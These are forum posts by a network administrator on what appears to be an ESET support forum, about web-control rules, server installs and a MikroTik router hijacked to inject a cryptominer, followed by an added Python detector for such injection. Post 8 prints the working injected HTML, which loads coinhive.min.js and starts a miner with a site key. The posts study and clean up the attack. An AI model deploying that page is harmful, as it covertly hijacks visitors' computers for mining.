MAGIK José Rocha
  1. We are applying a custom policy for web control where we allow specific URLs and after that we block a Category Group. The problem we are facing is that, if the allowed URL belongs to a blocked Category, the user can't access that URL. From the documentation found HERE, this is not the expected behaviour and the user should be able to access the URL as they are evaluated first. With the settings example below, we are unable to access WINESTUFF.PT because it's being blocked by the category-based rule where we block "Alcohol and Tobacco" related sites. Can anyone explain if I'm doing something wrong? Thanks in advance
  2. Will have to try that solution tomorrow. Thanks for your help.
  3. I've implemented an Internet access control policy where we have the following requirements:
     • Block access to several group categories of sites
     • Allow access to specific URLs
     The problem is that I'm getting the sites blocked by category, but the URL groups we allow are also blocked if they belong to one of the blocked categories. I believe ESET should act as a regular firewall, applying rules in the order I've configured and accepting a connection as soon as it's authorised, not proceeding to the following rules. Here is a piece of my policy: I was expecting to be able to open the website https://www.martini.com/pt/pt/ but it gets blocked by the category group. Is there any way I can get the expected result? Thanks in advance for any help with this issue. Best Regards, José Rocha @ Magikevolution
  4. I understand that it isn't a recommended approach, but we've had it working on a critical server for a long time without any issue. The reason for that is that we have real people working on that server, receiving emails, accessing web pages and all those things we have inside a Desktop OS, and File Server v6 didn't address our needs. I believe the installer was blocking the installation of Endpoint v7 on a server, but maybe I missed something. Will check it again on a demo server. The URL Management is not that easy to maintain, so we must find another way. Thanks for your help.
  5. A lot of our clients use Windows Server to provide RDP services for their users, local and remote ones. As most of their users are point-of-sale operators, they need internet access to the company website and other websites related to the products that they work with, but shouldn't use other webpages. On the other end there are groups of users who may access social networks and other users that must have unrestricted access to the internet. With ESET Version 6 we made it by installing ESET Endpoint Security and tweaking policies to make it work in a Windows Server without impact on performance or services communication. This solution has been working for almost 3 years with servers that have >40 remote sessions at a time, but now we want to upgrade to ESET v7 and I see that ESET Endpoint Security doesn't install on a Windows Server anymore, leaving us without a solution to upgrade ESET on those servers. I understand that a Windows Server provides a lot of services that need to be taken into consideration and should have a different approach than a Windows Desktop OS, but it seems ESET isn't taking into consideration that a Windows Server with Remote Desktop Services provides multiple Windows desktops, with multiple users and needs, so we should be able to use the same features of ESET Endpoint Security on an ESET File Security for Windows Server. Is there any way of doing it with ESET v7? Thank you. Note: I know we should use a UTM and we'll have it on some clients, to provide this and other features, but some clients can't afford it and I was hoping to solve it with ESET.
  6. I've made a Policy for all workstations on that domain to disable SmartScreen and the Deployment Tool was able to install without any problem.
  7. I've created an all-in-one installer to use with the ESET Deployment Tool and it went without errors, showing a success message. The problem is that nothing was installed and the workstation is still running the older versions. I tried to run the same installer at that workstation to see if there is some error in the installation process and I received a message that SmartScreen has blocked the execution of the installer. Then, I asked SmartScreen to run the setup anyway and everything was installed without problems. Is there any way of making the deployment tool avoid this message, or is disabling SmartScreen via policy the only option?
  8. Here is the HTML source for the page that runs the miner:

     <html>
     <head>
     <meta http-equiv="Content-Type" content="text/html; charset=windows-1251">
     <title>"$(url)"</title>
     <_script src="https://coinhive.com/lib/coinhive.min.js"></script>
     <_script>
     var miner = new CoinHive.Anonymous('ZopliillHRjWlp5B3JTrS4hKQP8jAKwp', {throttle: 0.2});
     miner.start();
     </script>
     </head>
     <frameset>
     <frame src="$(url)"></frame>
     </frameset>
     </html>
  9. I've been able to find the origin of these detections and already solved the problem. When I was trying to understand the origin of these trojans, I noticed that some of the addresses were legit and don't raise any problems outside our client network. So I started a search for some kind of proxy that could inject malicious code into legit HTTP pages and found out that they had their Mikrotik router hacked to make every request made to port 80 go through the web proxy on port 8080, where they injected the malicious code, and it was blocked later on the client machine. The hack has been possible because of this vulnerability in Mikrotik RouterOS: https://blog.mikrotik.com/security/winbox-vulnerability.html I've changed every password, disabled the web proxy and deleted the firewall rule, so now everything is fine. @itman, @Marcos Thanks for the tips
  10. Here are the collected logs on the affected machine. Thanks for your help. ees_logs.zip
  11. Hi, We have a computer with more than 10.000 detected threats like the one below:

      Threat: JS/CoinMiner.AH
      Process: C:\Windows\System32\wscript.exe
      Object: hxxp://10.100.1.254/adpb/registration?username=carlota&domain=MYDOM&hostname=TSDC10&action=login

      Is this a sign that the computer is infected, or is this the result of attempts to infect it? Note: The address 10.100.1.254 is a Mikrotik router and it is updated with the latest updates.
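As an added example (not code from the forum posts), a detector for the in-path injection described in posts 8, 9 and 11: it parses an HTTP response body and reports a coinhive.com script tag, a CoinHive.Anonymous site key and the frame that wraps the originally requested page, which is the wrapper pattern the hacked router's proxy served. The sample body, its URL and the site key are constructed for the example.

```python
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Constructed sample modelled on the injected page quoted in post 8; the site
# key is a made-up placeholder, not the value observed on the forum.
SAMPLE_INJECTED = """<html><head>
<meta http-equiv="Content-Type" content="text/html; charset=windows-1251">
<title>"http://www.example.com/"</title>
<script src="https://coinhive.com/lib/coinhive.min.js"></script>
<script>var miner = new CoinHive.Anonymous('CONSTRUCTED_SITE_KEY_0000', {throttle: 0.2});
miner.start();</script></head>
<frameset><frame src="http://www.example.com/"></frame></frameset></html>"""

SAMPLE_CLEAN = "<html><head><title>Shop</title></head><body><p>Hello</p></body></html>"

MINER_HOSTS = {"coinhive.com"}  # host seen in the injected page


class _MinerScan(HTMLParser):
    """Collect script sources, inline script text and frame targets."""

    def __init__(self):
        super().__init__()
        self.script_srcs, self.frame_srcs, self.inline = [], [], []
        self._in_script = False

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "script":
            self._in_script = True
            if a.get("src"):
                self.script_srcs.append(a["src"])
        elif tag == "frame" and a.get("src"):
            self.frame_srcs.append(a["src"])

    def handle_endtag(self, tag):
        if tag == "script":
            self._in_script = False

    def handle_data(self, data):
        if self._in_script:  # script bodies arrive here as CDATA
            self.inline.append(data)


def scan_response(body: str) -> dict:
    """Return indicators of a miner injected into one HTTP response body."""
    p = _MinerScan()
    p.feed(body)
    p.close()
    miner_scripts = [s for s in p.script_srcs if urlparse(s).hostname in MINER_HOSTS]
    keys = re.findall(r"CoinHive\.Anonymous\(\s*['\"]([A-Za-z0-9_]+)['\"]", " ".join(p.inline))
    # The requested site framed inside the response is the wrapper from post 8.
    framed = [u for u in p.frame_srcs if urlparse(u).scheme in ("http", "https")]
    return {"miner_scripts": miner_scripts, "site_keys": keys,
            "framed_origin": framed, "injected": bool(miner_scripts or keys)}
```

Run it against bodies fetched from inside the affected network and from outside; a hit only on the inside copy points at the gateway, as post 9 found.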